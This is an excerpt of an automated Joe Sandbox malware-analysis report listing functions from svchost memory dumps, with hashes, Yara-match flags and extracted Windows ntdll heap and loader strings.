                                                                                            • Opcode Fuzzy Hash: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                                            • Instruction Fuzzy Hash: F7A180369402299BDB24CF68DC84BA9B3B5BF58314F1949EFD848AB351D7309E84CF90
                                                                                            Function 03A2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                            • API String ID: 0-2586055223
                                                                                            • Opcode ID: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                                            • Instruction ID: aa296583c16daa479120f820bc5dcb9d0a36c31c6ecbe388f68d05c407762d64
                                                                                            • Opcode Fuzzy Hash: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                                            • Instruction Fuzzy Hash: 3561E076205780AFD721EB28C944F67BBF9EF84714F08086AF9558B391D734E941CB61
                                                                                            Function 00402D0A Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CV|$CV|$gfff$|
                                                                                            • API String ID: 0-3193153294
                                                                                            • Opcode ID: e7a5007481dda8e4a4196a522ca4ec33406c4e1c4f5740477c53a8be38a32eb0
                                                                                            • Instruction ID: a1a1deca0d2dda3937c2e99b57891cdccbf0c28398d2d5ae64b2bf8f95f011fa
                                                                                            • Opcode Fuzzy Hash: e7a5007481dda8e4a4196a522ca4ec33406c4e1c4f5740477c53a8be38a32eb0
                                                                                            • Instruction Fuzzy Hash: BC516B31F0020A47DB188D9DDE843D9BAA2EBE8304F58817BDD489F3C6D5B8AE0587D4
                                                                                            Function 00402D10 Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CV|$CV|$gfff$|
                                                                                            • API String ID: 0-3193153294
                                                                                            • Opcode ID: 1d8e4784891accfd47ed13edffe62c2f0d02ad1b8d387308c423930b404b555c
                                                                                            • Instruction ID: 081c143cfaa1c4e39a8e35fea610cb1901c9dde64770691b2feaf352c2fc1d04
                                                                                            • Opcode Fuzzy Hash: 1d8e4784891accfd47ed13edffe62c2f0d02ad1b8d387308c423930b404b555c
                                                                                            • Instruction Fuzzy Hash: B5515D31F0020A47DB188D9DDE843D9BA56EBE8304F58817ADD449F3C6D5B8AE0587D4
                                                                                            Function 03AE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                            • API String ID: 0-336120773
                                                                                            • Opcode ID: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                                            • Instruction ID: 5640fa5e1c611e059691ae399d2b88f17617e2d2565026375bfdb02ca5201fef
                                                                                            • Opcode Fuzzy Hash: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                                            • Instruction Fuzzy Hash: 6F31CB35600220EFD719EB98CD85FAAB7E8FF09764F18016BE451DB291E670EC41CA65
                                                                                            Function 03A29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                            • API String ID: 0-1391187441
                                                                                            • Opcode ID: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                                            • Instruction ID: b6a9564966e3799282a2e4182c10809bb47ef469efacd18763b38071f4bfc628
                                                                                            • Opcode Fuzzy Hash: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                                            • Instruction Fuzzy Hash: D4316076A00214EFCB11EB5AC985FAFBBB9EF45B20F14405BE815AB291D770ED40CA71
                                                                                            Function 03A429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03A4327D
                                                                                            • HEAP[%wZ]: , xrefs: 03A43255
                                                                                            • HEAP: , xrefs: 03A43264
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                            • API String ID: 0-617086771
                                                                                            • Opcode ID: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                                            • Instruction ID: b14979d86a1559113c921aa3d9c36d5cd517f9b81941745c007e2f4a2d3c5e5b
                                                                                            • Opcode Fuzzy Hash: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                                            • Instruction Fuzzy Hash: 2B929A74A042499FDF25CF68C5447AEBBF1EF89300F1884AEE899AB391D735A941CF50
                                                                                            Function 03A41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                                            • Instruction ID: 6ea9363dd267c2726302b933c256626521b982c24f16fff8d4d22345f4f04886
                                                                                            • Opcode Fuzzy Hash: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                                            • Instruction Fuzzy Hash: A522FB70A00641AFEB26CF28C495B7AFBF5EF46704F18849BE4559B392E735E881CB50
                                                                                            Function 03A40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-4253913091
                                                                                            • Opcode ID: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                                            • Instruction ID: 3347c6cf4e671669eb5ed9f59dc216b8eecbff1f1a6b9277a192a906454854d8
                                                                                            • Opcode Fuzzy Hash: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                                            • Instruction Fuzzy Hash: 36F1DE34A00605DFEB19DF68C980B6AF7F5FF85304F1881AAE516AB391D734E981CB90
                                                                                            Function 03A31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • HEAP[%wZ]: , xrefs: 03A31712
                                                                                            • HEAP: , xrefs: 03A31596
                                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03A31728
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                                            • Instruction ID: 610709e2ce17c858ad566b8fec25c91aa3b42083f67f7ac14f69ba074d6f8fc5
                                                                                            • Opcode Fuzzy Hash: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                                            • Instruction Fuzzy Hash: 2EE1C070A046469FDB29EF68C491B7ABBF5AF4A300F18855FF4968B345E734E940CB50
                                                                                            Function 03A3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                            • API String ID: 0-1145731471
                                                                                            • Opcode ID: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                                            • Instruction ID: 1da94759f46221035dff2fa4eafc4e17346b3cece483057297a480bc1dc9850c
                                                                                            • Opcode Fuzzy Hash: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                                            • Instruction Fuzzy Hash: F8B16A79A056449FEF25CF69C980BADB7B6EF45714F1889AFE451EB380D730A840CB60
                                                                                            Function 03AB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                            • API String ID: 0-2391371766
                                                                                            • Opcode ID: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                                            • Instruction ID: 23ee4bd00c63a88fc5779ea660b2770205c6327d03870154d0e23e6c51999e3b
                                                                                            • Opcode Fuzzy Hash: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                                            • Instruction Fuzzy Hash: 03B19D79604341AFEB21DF54C980BABB7FCAB49714F15092FFA409B291D771E844CB92
                                                                                            Function 03A56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $@
                                                                                            • API String ID: 0-1077428164
                                                                                            • Opcode ID: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                                            • Instruction ID: 2c2a95ef37f5fc73e27ac2bd630dcec5057f28a74874ed75174b36e260d49be9
                                                                                            • Opcode Fuzzy Hash: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                                            • Instruction Fuzzy Hash: 05C27D716087419FEB25CF24C880BABBBE5AF88754F08896FF989E7250D735D804CB52
                                                                                            Function 03A2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                            • API String ID: 0-2779062949
                                                                                            • Opcode ID: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                                            • Instruction ID: c4276869602d242dd173edf97e8cda97989e8d72cd8941fe8613abd6a72309ce
                                                                                            • Opcode Fuzzy Hash: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                                            • Instruction Fuzzy Hash: 7FA18C759012299BDB31EF24CD88BEAF7B8EF44710F1405EAE909AB250D7359E85CF60
                                                                                            Function 03AC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                            • API String ID: 0-318774311
                                                                                            • Opcode ID: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                                            • Instruction ID: ed5dfdd812346fdbc2f1b0aa39f5ab6ff36f9d0dfcfad91f7de8a22f3d420e0b
                                                                                            • Opcode Fuzzy Hash: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                                            • Instruction Fuzzy Hash: 81818E79618380AFDB11DB14C984B6AB7E8FF85750F08892EF9909B3D0D778D904CB52
                                                                                            Function 03A6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$&$@
                                                                                            • API String ID: 0-1537733988
                                                                                            • Opcode ID: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                                            • Instruction ID: daa09888330b133a13fbe6ec16afb9d69a637325e55ccae17112f64fbf2504e3
                                                                                            • Opcode Fuzzy Hash: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                                            • Instruction Fuzzy Hash: 0071D1705087019FC754DF24CA84A2BFBE9FF85618F144A1FE4AA8B290D730D905CB96
                                                                                            Function 03B0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03B0B82A
                                                                                            • TargetNtPath, xrefs: 03B0B82F
                                                                                            • GlobalizationUserSettings, xrefs: 03B0B834
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                            • API String ID: 0-505981995
                                                                                            • Opcode ID: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                                            • Instruction ID: f8ac4c2abfb6c65be880654ea99514b9fe64b38722deef5a26e131334f0ca0b7
                                                                                            • Opcode Fuzzy Hash: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                                            • Instruction Fuzzy Hash: A6617F76D41229ABDB21DF54DC88B9ABBB8EF04714F0101E5A508AB390DB74DE84CF90
                                                                                            Function 03A2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03A8E6C6
                                                                                            • HEAP[%wZ]: , xrefs: 03A8E6A6
                                                                                            • HEAP: , xrefs: 03A8E6B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                            • API String ID: 0-1340214556
                                                                                            • Opcode ID: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                                            • Instruction ID: 036c4df1b96919cc5b212d43e1c54dd64e74265abfca75975e59e93e7f8505a5
                                                                                            • Opcode Fuzzy Hash: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                                            • Instruction Fuzzy Hash: FF51C135604794EFD712EB68C944FAAFBF8EF05300F0845A6E9518B792D774E950CB20
                                                                                            Function 03ADDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • HEAP[%wZ]: , xrefs: 03ADDC12
                                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03ADDC32
                                                                                            • HEAP: , xrefs: 03ADDC1F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                            • API String ID: 0-3815128232
                                                                                            • Opcode ID: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                                            • Instruction ID: 8f12bc6512ad7c7b5b96af41c0907455de36936ffaef0503e1be773aac742157
                                                                                            • Opcode Fuzzy Hash: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                                            • Instruction Fuzzy Hash: B15122352046508EE374DB2EC848772B7F2EF45648F08888FE4D38F685D276E846DB21
                                                                                            Function 03A6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Failed to reallocate the system dirs string !, xrefs: 03AA82D7
                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 03AA82DE
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 03AA82E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1783798831
                                                                                            • Opcode ID: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                                            • Instruction ID: 2658679e4dca39bd962dd5367f5f5476536a5f439d4463705aadd68dadff5faa
                                                                                            • Opcode Fuzzy Hash: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                                            • Instruction Fuzzy Hash: 3A41F3B6944310ABC721EB68DA44B5B7BE8FF49764F044A2BF988D7250E774D8108B91
                                                                                            Function 03A616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03AA1B39
                                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 03AA1B4A
                                                                                            • LdrpAllocateTls, xrefs: 03AA1B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                            • API String ID: 0-4274184382
                                                                                            • Opcode ID: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                                            • Instruction ID: a61f9d262b8ab5298d84ca0675ea41bac60394a64342d3c4f7b09d47edaecf1a
                                                                                            • Opcode Fuzzy Hash: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                                            • Instruction Fuzzy Hash: 1541587AA00608AFCB25DFA8C941BAEFBF5FF49714F14811AE405AB350D775A800CF90
                                                                                            Function 03AEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • PreferredUILanguages, xrefs: 03AEC212
                                                                                            • @, xrefs: 03AEC1F1
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03AEC1C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                            • API String ID: 0-2968386058
                                                                                            • Opcode ID: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                                            • Instruction ID: 5ab04890a3e24fb31e98bcc2c766acfd892471d12dceba8989b9b751fc7dc686
                                                                                            • Opcode Fuzzy Hash: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                                            • Instruction Fuzzy Hash: 72418E76E00209EFDF15EBD8C995FEEB7BCAB44710F04406BE905BB290D7749A448B90
                                                                                            Function 03AC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                            • API String ID: 0-1373925480
                                                                                            • Opcode ID: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                                            • Instruction ID: 17b1b91cf4f3f09ddc2db6c0ad6f421ffe70fffb75e7dbf7771a928249ab3641
                                                                                            • Opcode Fuzzy Hash: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                                            • Instruction Fuzzy Hash: E84111359147888BEB26DBA6C964BADBBB8EF99340F18045FD841EF381D7348901CB14
                                                                                            Function 03AB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • LdrpCheckRedirection, xrefs: 03AB488F
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 03AB4899
                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03AB4888
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-3154609507
                                                                                            • Opcode ID: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                                            • Instruction ID: 781f91ffec14b80e1bdf07fd1a3660d804d8cbcf49958b23de19f10f9d4ff7cf
                                                                                            • Opcode Fuzzy Hash: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                                            • Instruction Fuzzy Hash: B341A232A047509FCB21CFAAD940AA6B7FCBB4E650B09065EEC589B353D731D850CB91
                                                                                            Function 03A633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlCreateActivationContext, xrefs: 03AA29F9
                                                                                            • SXS: %s() passed the empty activation context data, xrefs: 03AA29FE
                                                                                            • Actx , xrefs: 03A633AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                            • API String ID: 0-859632880
                                                                                            • Opcode ID: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                                            • Instruction ID: 90cc076018201ecea3f90f7c8e04fde8160ee720a7a6b78ea7e0bb2244057c5d
                                                                                            • Opcode Fuzzy Hash: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                                            • Instruction Fuzzy Hash: 6C3124366007059FDF26DF58C884B9AB7A4FB44711F09886BED059F2E2CB70D852CB90
                                                                                            Function 03A61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • DLL "%wZ" has TLS information at %p, xrefs: 03AA1A40
                                                                                            • LdrpInitializeTls, xrefs: 03AA1A47
                                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 03AA1A51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                            • API String ID: 0-931879808
                                                                                            • Opcode ID: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
